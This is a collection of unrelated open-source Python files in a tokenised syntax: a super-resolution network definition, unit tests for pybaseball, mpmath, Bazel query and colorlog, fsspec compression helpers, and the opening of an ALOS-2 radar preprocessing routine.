<import_stmt>torch.nn<as>nn<import_stmt>models.basicblock<as>B<import_stmt>torch<line_sep>""" # -------------------------------------------- # SRMD (15 conv layers) # -------------------------------------------- Reference: @inproceedings{zhang2018learning, title={Learning a single convolutional super-resolution network for multiple degradations}, author={<NAME> and <NAME> and <NAME>}, booktitle={IEEE Conference on Computer Vision and Pattern Recognition}, pages={3262--3271}, year={2018} } http://openaccess.thecvf.com/content_cvpr_2018/papers/Zhang_Learning_a_Single_CVPR_2018_paper.pdf """<line_sep># -------------------------------------------- # SRMD (SRMD, in_nc = 3+15+1 = 19) # SRMD (SRMDNF, in_nc = 3+15 = 18) # -------------------------------------------- <class_stmt>SRMD(nn.Module)<block_start><def_stmt>__init__ self in_nc=19 out_nc=3 nc=128 nb=12 upscale=4 act_mode='R' upsample_mode='pixelshuffle'<block_start>""" # ------------------------------------ in_nc: channel number of input, default: 3+15 out_nc: channel number of output nc: channel number nb: total number of conv layers upscale: scale factor act_mode: batch norm + activation function; 'BR' means BN+ReLU upsample_mode: default 'pixelshuffle' = conv + pixelshuffle # ------------------------------------ """<line_sep>super(SRMD self).__init__()<assert_stmt>'R'<in>act_mode<or>'L'<in>act_mode 'Examples of activation function: R, L, BR, BL, IR, IL'<line_sep>bias=<true><if_stmt>upsample_mode<eq>'upconv'<block_start>upsample_block=B.upsample_upconv<block_end><elif_stmt>upsample_mode<eq>'pixelshuffle'<block_start>upsample_block=B.upsample_pixelshuffle<block_end><elif_stmt>upsample_mode<eq>'convtranspose'<block_start>upsample_block=B.upsample_convtranspose<block_end><else_stmt><block_start><raise>NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))<block_end>m_head=B.conv(in_nc nc mode='C'+act_mode[-1] bias=bias)<line_sep>m_body=[B.conv(nc nc mode='C'+act_mode bias=bias)<for>_ range(nb-2)]<line_sep>m_tail=upsample_block(nc out_nc mode=str(upscale) bias=bias)<line_sep>self.model=B.sequential(m_head *m_body m_tail)<block_end># def forward(self, x, k_pca): # m = k_pca.repeat(1, 1, x.size()[-2], x.size()[-1]) # x = torch.cat((x, m), 1) # x = self.body(x) <def_stmt>forward self x<block_start>x=self.model(x)<line_sep><return>x<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_from_stmt>utils utils_model<line_sep>model=SRMD(in_nc=18 out_nc=3 nc=64 nb=15 upscale=4 act_mode='R' upsample_mode='pixelshuffle')<line_sep>print(utils_model.describe_model(model))<line_sep>x=torch.randn((2 3 100 100))<line_sep>k_pca=torch.randn(2 15 1 1)<line_sep>x=model(x k_pca)<line_sep>print(x.shape)<line_sep># run models/network_srmd.py <block_end>
<import_stmt>pytest<import_stmt>pandas<as>pd<import_from_stmt>pandas.testing assert_frame_equal assert_series_equal<import_from_stmt>pybaseball.plotting transform_coordinates<line_sep>@pytest.fixture<def_stmt>coords <block_start><return>pd.DataFrame({"x":[1.0 2.0 -1.0] "y":[1.0 0.0 10.0]})<block_end><def_stmt>test_transform_coordinates_identity_scale coords<block_start>transformed_coords=transform_coordinates(coords scale=1)<line_sep>assert_series_equal(coords.x transformed_coords.x)<line_sep>assert_series_equal(-coords.y transformed_coords.y)<block_end><def_stmt>test_transform_coordinates coords<block_start>transformed_coords=transform_coordinates(coords scale=2 x_center=0 y_center=0)<line_sep>assert_series_equal(2<times>coords.x transformed_coords.x)<line_sep>assert_series_equal(-2<times>coords.y transformed_coords.y)<line_sep>transformed_coords=transform_coordinates(coords scale=2 x_center=1 y_center=1)<line_sep>expected=pd.DataFrame({"x":[1.0 3.0 -3.0] "y":[-1.0 1.0 -19.0]})<line_sep>assert_frame_equal(expected transformed_coords)<line_sep>xc=123.4<line_sep>yc=432.1<line_sep>transformed_coords=transform_coordinates(coords scale=0 x_center=xc y_center=yc)<line_sep>assert_series_equal(pd.Series(name="x" data=3<times>[xc]) transformed_coords.x)<line_sep>assert_series_equal(pd.Series(name="y" data=3<times>[yc]) -transformed_coords.y)<block_end>
# TODO: don't use round <import_from_future_stmt> division<import_from_stmt>sympy.mpmath *<line_sep>xrange=libmp.backend.xrange<line_sep># XXX: these shouldn't be visible(?) LU_decomp=mp.LU_decomp<line_sep>L_solve=mp.L_solve<line_sep>U_solve=mp.U_solve<line_sep>householder=mp.householder<line_sep>improve_solution=mp.improve_solution<line_sep>A1=matrix([[3 1 6] [2 1 3] [1 1 1]])<line_sep>b1=[2 7 4]<line_sep>A2=matrix([[2 -1 -1 2] [6 -2 3 -1] [-4 2 3 -2] [2 0 4 -3]])<line_sep>b2=[3 -3 -2 -1]<line_sep>A3=matrix([[1 0 -1 -1 0] [0 1 1 0 -1] [4 -5 2 0 0] [0 0 -2 9 -12] [0 5 0 0 12]])<line_sep>b3=[0 0 0 0 50]<line_sep>A4=matrix([[10.235 -4.56 0. -0.035 5.67] [-2.463 1.27 3.97 -8.63 1.08] [-6.58 0.86 -0.257 9.32 -43.6] [9.83 7.39 -17.25 0.036 24.86] [-9.31 34.9 78.56 1.07 65.8]])<line_sep>b4=[8.95 20.54 7.42 5.60 58.43]<line_sep>A5=matrix([[1 2 -4] [-2 -3 5] [3 5 -8]])<line_sep>A6=matrix([[1.377360 2.481400 5.359190] [2.679280 -1.229560 25.560210] [-1.225280+1.e6 9.910180 -35.049900-1.e6]])<line_sep>b6=[23.500000 -15.760000 2.340000]<line_sep>A7=matrix([[1 -0.5] [2 1] [-2 6]])<line_sep>b7=[3 2 -4]<line_sep>A8=matrix([[1 2 3] [-1 0 1] [-1 -2 -1] [1 0 -1]])<line_sep>b8=[1 2 3 4]<line_sep>A9=matrix([[4 2 -2] [2 5 -4] [-2 -4 5.5]])<line_sep>b9=[10 16 -15.5]<line_sep>A10=matrix([[1.0+1.0j 2.0 2.0] [4.0 5.0 6.0] [7.0 8.0 9.0]])<line_sep>b10=[1.0 1.0+1.0j 1.0]<def_stmt>test_LU_decomp <block_start>A=A3.copy()<line_sep>b=b3<line_sep>A,p=LU_decomp(A)<line_sep>y=L_solve(A b p)<line_sep>x=U_solve(A y)<assert_stmt>p<eq>[2 1 2 3]<assert_stmt>[round(i 14)<for>i x]<eq>[3.78953107960742 2.9989094874591098 -0.081788440567070006 3.8713195201744801 2.9171210468920399]<line_sep>A=A4.copy()<line_sep>b=b4<line_sep>A,p=LU_decomp(A)<line_sep>y=L_solve(A b p)<line_sep>x=U_solve(A y)<assert_stmt>p<eq>[0 3 4 3]<assert_stmt>[round(i 14)<for>i x]<eq>[2.6383625899619201 2.6643834462368399 0.79208015947958998 -2.5088376454101899 -1.0567657691375001]<line_sep>A=randmatrix(3)<line_sep>bak=A.copy()<line_sep>LU_decomp(A overwrite=1)<assert_stmt>A<ne>bak<block_end><def_stmt>test_inverse <block_start><for_stmt>A [A1 A2 A5]<block_start>inv=inverse(A)<assert_stmt>mnorm(A<times>inv-eye(A.rows) 1)<l>1.e-14<block_end><block_end><def_stmt>test_householder <block_start>mp.dps=15<line_sep>A,b=A8 b8<line_sep>H,p,x,r=householder(extend(A b))<assert_stmt>H<eq>matrix([[mpf('3.0') mpf('-2.0') mpf('-1.0') 0] [-1.0 mpf('3.333333333333333') mpf('-2.9999999999999991') mpf('2.0')] [-1.0 mpf('-0.66666666666666674') mpf('2.8142135623730948') mpf('-2.8284271247461898')] [1.0 mpf('-1.3333333333333333') mpf('-0.20000000000000018') mpf('4.2426406871192857')]])<assert_stmt>p<eq>[-2 -2 mpf('-1.4142135623730949')]<assert_stmt>round(norm(r 2) 10)<eq>4.2426406870999998<line_sep>y=[102.102 58.344 36.463 24.310 17.017 12.376 9.282 7.140 5.610 4.488 3.6465 3.003]<def_stmt>coeff n# similiar to Hilbert matrix <block_start>A=[]<for_stmt>i range(1 13)<block_start>A.append([1./(i+j-1)<for>j range(1 n+1)])<block_end><return>matrix(A)<block_end>residuals=[]<line_sep>refres=[]<for_stmt>n range(2 7)<block_start>A=coeff(n)<line_sep>H,p,x,r=householder(extend(A y))<line_sep>x=matrix(x)<line_sep>y=matrix(y)<line_sep>residuals.append(norm(r 2))<line_sep>refres.append(norm(residual(A x y) 2))<block_end><assert_stmt>[round(res 10)<for>res residuals]<eq>[15.1733888877 0.82378073210000002 0.302645887 0.0260109244 0.00058653999999999998]<assert_stmt>norm(matrix(residuals)-matrix(refres) inf)<l>1.e-13<block_end><def_stmt>test_factorization <block_start>A=randmatrix(5)<line_sep>P,L,U=lu(A)<assert_stmt>mnorm(P<times>A-L<times>U 1)<l>1.e-15<block_end><def_stmt>test_solve <block_start><assert_stmt>norm(residual(A6 lu_solve(A6 b6) b6) inf)<l>1.e-10<assert_stmt>norm(residual(A7 lu_solve(A7 b7) b7) inf)<l>1.5<assert_stmt>norm(residual(A8 lu_solve(A8 b8) b8) inf)<le>3+1.e-10<assert_stmt>norm(residual(A6 qr_solve(A6 b6)[0] b6) inf)<l>1.e-10<assert_stmt>norm(residual(A7 qr_solve(A7 b7)[0] b7) inf)<l>1.5<assert_stmt>norm(residual(A8 qr_solve(A8 b8)[0] b8) 2)<le>4.3<assert_stmt>norm(residual(A10 lu_solve(A10 b10) b10) 2)<l>1.e-10<assert_stmt>norm(residual(A10 qr_solve(A10 b10)[0] b10) 2)<l>1.e-10<block_end><def_stmt>test_solve_overdet_complex <block_start>A=matrix([[1 2j] [3 4j] [5 6]])<line_sep>b=matrix([1+j 2 -j])<assert_stmt>norm(residual(A lu_solve(A b) b))<l>1.0208<block_end><def_stmt>test_singular <block_start>mp.dps=15<line_sep>A=[[5.6 1.2] [7./15 .1]]<line_sep>B=repr(zeros(2))<line_sep>b=[1 2]<def_stmt>_assert_ZeroDivisionError statement<block_start><try_stmt><block_start>eval(statement)<assert_stmt><false><block_end><except_stmt>(ZeroDivisionError ValueError)<block_start><pass><block_end><block_end><for_stmt>i ['lu_solve(%s, %s)'%(A b) 'lu_solve(%s, %s)'%(B b) 'qr_solve(%s, %s)'%(A b) 'qr_solve(%s, %s)'%(B b)]<block_start>_assert_ZeroDivisionError(i)<block_end><block_end><def_stmt>test_cholesky <block_start><assert_stmt>fp.cholesky(fp.matrix(A9))<eq>fp.matrix([[2 0 0] [1 2 0] [-1 -3/2 3/2]])<line_sep>x=fp.cholesky_solve(A9 b9)<assert_stmt>fp.norm(fp.residual(A9 x b9) fp.inf)<eq>0<block_end><def_stmt>test_det <block_start><assert_stmt>det(A1)<eq>1<assert_stmt>round(det(A2) 14)<eq>8<assert_stmt>round(det(A3))<eq>1834<assert_stmt>round(det(A4))<eq>4443376<assert_stmt>det(A5)<eq>1<assert_stmt>round(det(A6))<eq>78356463<assert_stmt>det(zeros(3))<eq>0<block_end><def_stmt>test_cond <block_start>mp.dps=15<line_sep>A=matrix([[1.2969 0.8648] [0.2161 0.1441]])<assert_stmt>cond(A <lambda>x:mnorm(x 1))<eq>mpf('327065209.73817754')<assert_stmt>cond(A <lambda>x:mnorm(x inf))<eq>mpf('327065209.73817754')<assert_stmt>cond(A <lambda>x:mnorm(x 'F'))<eq>mpf('249729266.80008656')<block_end>@extradps(50)<def_stmt>test_precision <block_start>A=randmatrix(10 10)<assert_stmt>mnorm(inverse(inverse(A))-A 1)<l>1.e-45<block_end><def_stmt>test_interval_matrix <block_start>mp.dps=15<line_sep>iv.dps=15<line_sep>a=iv.matrix([['0.1' '0.3' '1.0'] ['7.1' '5.5' '4.8'] ['3.2' '4.4' '5.6']])<line_sep>b=iv.matrix(['4' '0.6' '0.5'])<line_sep>c=iv.lu_solve(a b)<assert_stmt>c[0].delta<l>1e-13<assert_stmt>c[1].delta<l>1e-13<assert_stmt>c[2].delta<l>1e-13<assert_stmt>5.25823271130625686059275<in>c[0]<assert_stmt>-13.155049396267837541163<in>c[1]<assert_stmt>7.42069154774972557628979<in>c[2]<block_end><def_stmt>test_LU_cache <block_start>A=randmatrix(3)<line_sep>LU=LU_decomp(A)<assert_stmt>A._LU<eq>LU_decomp(A)<line_sep>A[0 0]=-1000<assert_stmt>A._LU<is><none><block_end><def_stmt>test_improve_solution <block_start>A=randmatrix(5 min=1e-20 max=1e20)<line_sep>b=randmatrix(5 1 min=-1000 max=1000)<line_sep>x1=lu_solve(A b)+randmatrix(5 1 min=-1e-5 max=1.e-5)<line_sep>x2=improve_solution(A x1 b)<assert_stmt>norm(residual(A x2 b) 2)<l>norm(residual(A x1 b) 2)<block_end><def_stmt>test_exp_pade <block_start><for_stmt>i range(3)<block_start>dps=15<line_sep>extra=15<line_sep>mp.dps=dps+extra<line_sep>dm=0<line_sep>N=3<line_sep>dg=range(1 N+1)<line_sep>a=diag(dg)<line_sep>expa=diag([exp(x)<for>x dg])<line_sep># choose a random matrix not close to be singular # to avoid adding too much extra precision in computing # m**-1 * M * m <while_stmt>abs(dm)<l>0.01<block_start>m=randmatrix(N)<line_sep>dm=det(m)<block_end>m=m/dm<line_sep>a1=m<power>-1<times>a<times>m<line_sep>e2=m<power>-1<times>expa<times>m<line_sep>mp.dps=dps<line_sep>e1=expm(a1 method='pade')<line_sep>mp.dps=dps+extra<line_sep>d=e2-e1<line_sep>#print d mp.dps=dps<assert_stmt>norm(d inf).ae(0)<block_end>mp.dps=15<block_end><def_stmt>test_qr <block_start>mp.dps=15# used default value for dps lowlimit=-9# lower limit of matrix element value uplimit=9# uppter limit of matrix element value maxm=4# max matrix size flg=<false># toggle to create real vs complex matrix zero=mpf('0.0')<for_stmt>k xrange(0 10)<block_start>exdps=0<line_sep>mode='full'<line_sep>flg=bool(k%2)<line_sep># generate arbitrary matrix size (2 to maxm) num1=nint(2+(maxm-2)<times>rand())<line_sep>num2=nint(2+(maxm-2)<times>rand())<line_sep>m=int(max(num1 num2))<line_sep>n=int(min(num1 num2))<line_sep># create matrix A=mp.matrix(m n)<line_sep># populate matrix values with arbitrary integers <if_stmt>flg<block_start>flg=<false><line_sep>dtype='complex'<for_stmt>j xrange(0 n)<block_start><for_stmt>i xrange(0 m)<block_start>val=nint(lowlimit+(uplimit-lowlimit)<times>rand())<line_sep>val2=nint(lowlimit+(uplimit-lowlimit)<times>rand())<line_sep>A[i j]=mpc(val val2)<block_end><block_end><block_end><else_stmt><block_start>flg=<true><line_sep>dtype='real'<for_stmt>j xrange(0 n)<block_start><for_stmt>i xrange(0 m)<block_start>val=nint(lowlimit+(uplimit-lowlimit)<times>rand())<line_sep>A[i j]=mpf(val)<block_end><block_end><block_end># perform A -> QR decomposition Q,R=qr(A mode edps=exdps)<line_sep>#print('\n\n A = \n', nstr(A, 4)) #print('\n Q = \n', nstr(Q, 4)) #print('\n R = \n', nstr(R, 4)) #print('\n Q*R = \n', nstr(Q*R, 4)) maxnorm=mpf('1.0E-11')<line_sep>n1=norm(A-Q<times>R)<line_sep>#print '\n Norm of A - Q * R = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end><if_stmt>dtype<eq>'real'<block_start>n1=norm(eye(m)-Q.T<times>Q)<line_sep>#print ' Norm of I - Q.T * Q = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end>n1=norm(eye(m)-Q<times>Q.T)<line_sep>#print ' Norm of I - Q * Q.T = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end><block_end><if_stmt>dtype<eq>'complex'<block_start>n1=norm(eye(m)-Q.T<times>Q.conjugate())<line_sep>#print ' Norm of I - Q.T * Q.conjugate() = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end>n1=norm(eye(m)-Q.conjugate()<times>Q.T)<line_sep>#print ' Norm of I - Q.conjugate() * Q.T = ', n1 <if_stmt>n1<g>maxnorm<block_start><raise>ValueError('Excessive norm value')<block_end><block_end><block_end><block_end>
# pylint: disable=g-bad-file-header # Copyright 2018 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>unittest<import_from_stmt>src.test.py.bazel test_base<class_stmt>QueryTest(test_base.TestBase)<block_start><def_stmt>testSimpleQuery self<block_start>self.ScratchFile('WORKSPACE')<line_sep>self.ScratchFile('foo/BUILD' ['exports_files(["exported.txt"])' 'filegroup(name = "top-rule", srcs = [":dep-rule"])' 'filegroup(name = "dep-rule", srcs = ["src.txt"])' ])<line_sep>self.ScratchFile('foo/src.txt')<line_sep>self.ScratchFile('foo/exported.txt')<line_sep>self.ScratchFile('foo/non-exported.txt')<line_sep>self._AssertQueryOutput('//foo:top-rule' '//foo:top-rule')<line_sep>self._AssertQueryOutput('//foo:*' '//foo:top-rule' '//foo:dep-rule' '//foo:src.txt' '//foo:exported.txt' '//foo:BUILD')<line_sep>self._AssertQueryOutput('deps(//foo:top-rule)' '//foo:top-rule' '//foo:dep-rule' '//foo:src.txt')<line_sep>self._AssertQueryOutput('deps(//foo:top-rule, 1)' '//foo:top-rule' '//foo:dep-rule')<block_end><def_stmt>_AssertQueryOutput self query_expr *expected_results<block_start>exit_code,stdout,stderr=self.RunBazel(['query' query_expr])<line_sep>self.AssertExitCode(exit_code 0 stderr)<line_sep>stdout=sorted(x<for>x stdout<if>x)<line_sep>self.assertEqual(len(stdout) len(expected_results))<line_sep>self.assertListEqual(stdout sorted(expected_results))<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
"""Test the colorlog.colorlog module."""<import_stmt>sys<import_stmt>pytest<def_stmt>test_colored_formatter create_and_test_logger<block_start>create_and_test_logger()<block_end><def_stmt>test_custom_colors create_and_test_logger<block_start>"""Disable all colors and check no escape codes are output."""<line_sep>create_and_test_logger(log_colors={} reset=<false> validator=<lambda>line:'\x1b['<not><in>line)<block_end><def_stmt>test_reset create_and_test_logger<block_start>create_and_test_logger(reset=<true> validator=<lambda>l:l.endswith('\x1b[0m'))<block_end><def_stmt>test_no_reset create_and_test_logger<block_start>create_and_test_logger(fmt="%(reset)s%(log_color)s%(levelname)s:%(name)s:%(message)s" reset=<false> # Check that each line does not end with an escape code validator=<lambda>line:<not>line.endswith('\x1b[0m'))<block_end><def_stmt>test_secondary_colors create_and_test_logger<block_start>expected=':\x1b[31mtest_secondary_colors:\x1b[34m'<line_sep>create_and_test_logger(fmt=("%(log_color)s%(levelname)s:"<concat>"%(name_log_color)s%(name)s:"<concat>"%(message_log_color)s%(message)s") secondary_log_colors={'name':{'DEBUG':'red' 'INFO':'red' 'WARNING':'red' 'ERROR':'red' 'CRITICAL':'red' } 'message':{'DEBUG':'blue' 'INFO':'blue' 'WARNING':'blue' 'ERROR':'blue' 'CRITICAL':'blue' }} validator=<lambda>line:expected<in>line)<block_end><def_stmt>test_some_secondary_colors create_and_test_logger<block_start>lines=create_and_test_logger(fmt="%(message_log_color)s%(message)s" secondary_log_colors={'message':{'ERROR':'red' 'CRITICAL':'red'}})<line_sep># Check that only two lines are colored <assert_stmt>len([l<for>l lines<if>'\x1b[31m'<in>l])<eq>2<block_end>@pytest.mark.skipif(sys.version_info<l>(3 2) reason="requires python3.2")<def_stmt>test_braces_style create_and_test_logger<block_start>create_and_test_logger(fmt='{log_color}{levelname}:{name}:{message}' style='{')<block_end>@pytest.mark.skipif(sys.version_info<l>(3 2) reason="requires python3.2")<def_stmt>test_template_style create_and_test_logger<block_start>create_and_test_logger(fmt='${log_color}${levelname}:${name}:${message}' style='$')<block_end>
"""Helper functions for a standard streaming compression API"""<import_from_stmt>bz2 BZ2File<import_from_stmt>gzip GzipFile<import_from_stmt>zipfile ZipFile<import_stmt>fsspec.utils<import_from_stmt>fsspec.spec AbstractBufferedFile<def_stmt>noop_file file mode **kwargs<block_start><return>file<block_end># should be functions of the form func(infile, mode=, **kwargs) -> file-like compr={<none>:noop_file}<def_stmt>register_compression name callback extensions force=<false><block_start>"""Register an "inferable" file compression type. Registers transparent file compression type for use with fsspec.open. Compression can be specified by name in open, or "infer"-ed for any files ending with the given extensions. Args: name: (str) The compression type name. Eg. "gzip". callback: A callable of form (infile, mode, **kwargs) -> file-like. Accepts an input file-like object, the target mode and kwargs. Returns a wrapped file-like object. extensions: (str, Iterable[str]) A file extension, or list of file extensions for which to infer this compression scheme. Eg. "gz". force: (bool) Force re-registration of compression type or extensions. Raises: ValueError: If name or extensions already registered, and not force. """<if_stmt>isinstance(extensions str)<block_start>extensions=[extensions]<block_end># Validate registration <if_stmt>name<in>compr<and><not>force<block_start><raise>ValueError("Duplicate compression registration: %s"%name)<block_end><for_stmt>ext extensions<block_start><if_stmt>ext<in>fsspec.utils.compressions<and><not>force<block_start><raise>ValueError("Duplicate compression file extension: %s (%s)"%(ext name))<block_end><block_end>compr[name]=callback<for_stmt>ext extensions<block_start>fsspec.utils.compressions[ext]=name<block_end><block_end><def_stmt>unzip infile mode="rb" filename=<none> **kwargs<block_start><if_stmt>"r"<not><in>mode<block_start>filename=filename<or>"file"<line_sep>z=ZipFile(infile mode="w" **kwargs)<line_sep>fo=z.open(filename mode="w")<line_sep>fo.close=<lambda>closer=fo.close:closer()<or>z.close()<line_sep><return>fo<block_end>z=ZipFile(infile)<if_stmt>filename<is><none><block_start>filename=z.namelist()[0]<block_end><return>z.open(filename mode="r" **kwargs)<block_end>register_compression("zip" unzip "zip")<line_sep>register_compression("bz2" BZ2File "bz2")<line_sep>register_compression("gzip" <lambda>f **kwargs:GzipFile(fileobj=f **kwargs) "gz")<try_stmt><block_start><import_stmt>lzma<line_sep>register_compression("lzma" lzma.LZMAFile "xz")<line_sep>register_compression("xz" lzma.LZMAFile "xz" force=<true>)<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_stmt>lzmaffi<line_sep>register_compression("lzma" lzmaffi.LZMAFile "xz" force=<true>)<line_sep>register_compression("xz" lzmaffi.LZMAFile "xz" force=<true>)<block_end><except_stmt>ImportError<block_start><pass><block_end><class_stmt>SnappyFile(AbstractBufferedFile)<block_start><def_stmt>__init__ self infile mode **kwargs<block_start><import_stmt>snappy<line_sep>self.details={"size":999999999}# not true, but OK if we don't seek super().__init__(fs=<none> path="snappy" mode=mode.strip("b")+"b" **kwargs)<line_sep>self.infile=infile<if_stmt>"r"<in>mode<block_start>self.codec=snappy.StreamDecompressor()<block_end><else_stmt><block_start>self.codec=snappy.StreamCompressor()<block_end><block_end><def_stmt>_upload_chunk self final=<false><block_start>self.buffer.seek(0)<line_sep>out=self.codec.add_chunk(self.buffer.read())<line_sep>self.infile.write(out)<line_sep><return><true><block_end><def_stmt>seek self loc whence=0<block_start><raise>NotImplementedError("SnappyFile is not seekable")<block_end><def_stmt>seekable self<block_start><return><false><block_end><def_stmt>_fetch_range self start end<block_start>"""Get the specified set of bytes from remote"""<line_sep>data=self.infile.read(end-start)<line_sep><return>self.codec.decompress(data)<block_end><block_end><try_stmt><block_start><import_stmt>snappy<line_sep>snappy.compress<line_sep># Snappy may use the .sz file extension, but this is not part of the # standard implementation. register_compression("snappy" SnappyFile [])<block_end><except_stmt>(ImportError NameError)<block_start><pass><block_end><try_stmt><block_start><import_stmt>lz4.frame<line_sep>register_compression("lz4" lz4.frame.open "lz4")<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start><import_stmt>zstandard<as>zstd<def_stmt>zstandard_file infile mode="rb"<block_start><if_stmt>"r"<in>mode<block_start>cctx=zstd.ZstdDecompressor()<line_sep><return>cctx.stream_reader(infile)<block_end><else_stmt><block_start>cctx=zstd.ZstdCompressor(level=10)<line_sep><return>cctx.stream_writer(infile)<block_end><block_end>register_compression("zstd" zstandard_file "zst")<block_end><except_stmt>ImportError<block_start><pass><block_end>
# # Author: <NAME> # Copyright 2015-present, NASA-JPL/Caltech # <import_stmt>os<import_stmt>glob<import_stmt>logging<import_stmt>datetime<import_stmt>numpy<as>np<import_stmt>isceobj<import_stmt>isceobj.Sensor.MultiMode<as>MultiMode<import_from_stmt>isceobj.Planet.Planet Planet<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic runCmd<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic getBboxRdr<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic getBboxGeo<import_from_stmt>isceobj.Alos2Proc.Alos2ProcPublic modeProcParDict<line_sep>logger=logging.getLogger('isce.alos2insar.runPreprocessor')<def_stmt>runPreprocessor self<block_start>'''Extract images. '''<line_sep>catalog=isceobj.Catalog.createCatalog(self._insar.procDoc.name)<line_sep>#find files #actually no need to use absolute path any longer, since we are able to find file from vrt now. 27-JAN-2020, CRL. #denseoffset may still need absolute path when making links self.referenceDir=os.path.abspath(self.referenceDir)<line_sep>self.secondaryDir=os.path.abspath(self.secondaryDir)<line_sep>ledFilesReference=sorted(glob.glob(os.path.join(self.referenceDir 'LED-ALOS2*-*-*')))<line_sep>imgFilesReference=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*-*-*'.format(self.referencePolarization.upper()))))<line_sep>ledFilesSecondary=sorted(glob.glob(os.path.join(self.secondaryDir 'LED-ALOS2*-*-*')))<line_sep>imgFilesSecondary=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*-*-*'.format(self.secondaryPolarization.upper()))))<line_sep>firstFrameReference=ledFilesReference[0].split('-')[-3][-4:]<line_sep>firstFrameSecondary=ledFilesSecondary[0].split('-')[-3][-4:]<line_sep>firstFrameImagesReference=sorted(glob.glob(os.path.join(self.referenceDir 'IMG-{}-ALOS2*{}-*-*'.format(self.referencePolarization.upper() firstFrameReference))))<line_sep>firstFrameImagesSecondary=sorted(glob.glob(os.path.join(self.secondaryDir 'IMG-{}-ALOS2*{}-*-*'.format(self.secondaryPolarization.upper() firstFrameSecondary))))<line_sep>#determin operation mode referenceMode=os.path.basename(ledFilesReference[0]).split('-')[-1][0:3]<line_sep>secondaryMode=os.path.basename(ledFilesSecondary[0]).split('-')[-1][0:3]<line_sep>spotlightModes=['SBS']<line_sep>stripmapModes=['UBS' 'UBD' 'HBS' 'HBD' 'HBQ' 'FBS' 'FBD' 'FBQ']<line_sep>scansarNominalModes=['WBS' 'WBD' 'WWS' 'WWD']<line_sep>scansarWideModes=['VBS' 'VBD']<line_sep>scansarModes=['WBS' 'WBD' 'WWS' 'WWD' 'VBS' 'VBD']<line_sep>#usable combinations <if_stmt>(referenceMode<in>spotlightModes)<and>(secondaryMode<in>spotlightModes)<block_start>self._insar.modeCombination=0<block_end><elif_stmt>(referenceMode<in>stripmapModes)<and>(secondaryMode<in>stripmapModes)<block_start>self._insar.modeCombination=1<block_end><elif_stmt>(referenceMode<in>scansarNominalModes)<and>(secondaryMode<in>scansarNominalModes)<block_start>self._insar.modeCombination=21<block_end><elif_stmt>(referenceMode<in>scansarWideModes)<and>(secondaryMode<in>scansarWideModes)<block_start>self._insar.modeCombination=22<block_end><elif_stmt>(referenceMode<in>scansarNominalModes)<and>(secondaryMode<in>stripmapModes)<block_start>self._insar.modeCombination=31<block_end><elif_stmt>(referenceMode<in>scansarWideModes)<and>(secondaryMode<in>stripmapModes)<block_start>self._insar.modeCombination=32<block_end><else_stmt><block_start>print('\n\nthis mode combination is not possible')<line_sep>print('note that for ScanSAR-stripmap, ScanSAR must be reference\n\n')<line_sep><raise>Exception('mode combination not supported')<block_end># pixel size from real data processing. azimuth pixel size may change a bit as # the antenna points to a different swath and therefore uses a different PRF. # MODE RANGE PIXEL SIZE (LOOKS) AZIMUTH PIXEL SIZE (LOOKS) # ------------------------------------------------------------------- # SPT [SBS] # 1.4304222392897463 (2) 0.9351804642158579 (4) # SM1 [UBS,UBD] # 1.4304222392897463 (2) 1.8291988125114438 (2) # SM2 [HBS,HBD,HBQ] # 2.8608444785794984 (2) 3.0672373839847196 (2) # SM3 [FBS,FBD,FBQ] # 4.291266717869248 (2) 3.2462615913656667 (4) # WD1 [WBS,WBD] [WWS,WWD] # 8.582533435738496 (1) 2.6053935830031887 (14) # 8.582533435738496 (1) 2.092362043327227 (14) # 8.582533435738496 (1) 2.8817632034495717 (14) # 8.582533435738496 (1) 3.054362492601842 (14) # 8.582533435738496 (1) 2.4582084463356977 (14) # WD2 [VBS,VBD] # 8.582533435738496 (1) 2.9215796012950728 (14) # 8.582533435738496 (1) 3.088859074497863 (14) # 8.582533435738496 (1) 2.8792293071133073 (14) # 8.582533435738496 (1) 3.0592146044234854 (14) # 8.582533435738496 (1) 2.8818767752199137 (14) # 8.582533435738496 (1) 3.047038521027477 (14) # 8.582533435738496 (1) 2.898816222039108 (14) #determine default number of looks: self._insar.numberRangeLooks1=self.numberRangeLooks1<line_sep>self._insar.numberAzimuthLooks1=self.numberAzimuthLooks1<line_sep>self._insar.numberRangeLooks2=self.numberRangeLooks2<line_sep>self._insar.numberAzimuthLooks2=self.numberAzimuthLooks2<line_sep>#the following two will be automatically determined by runRdrDemOffset.py 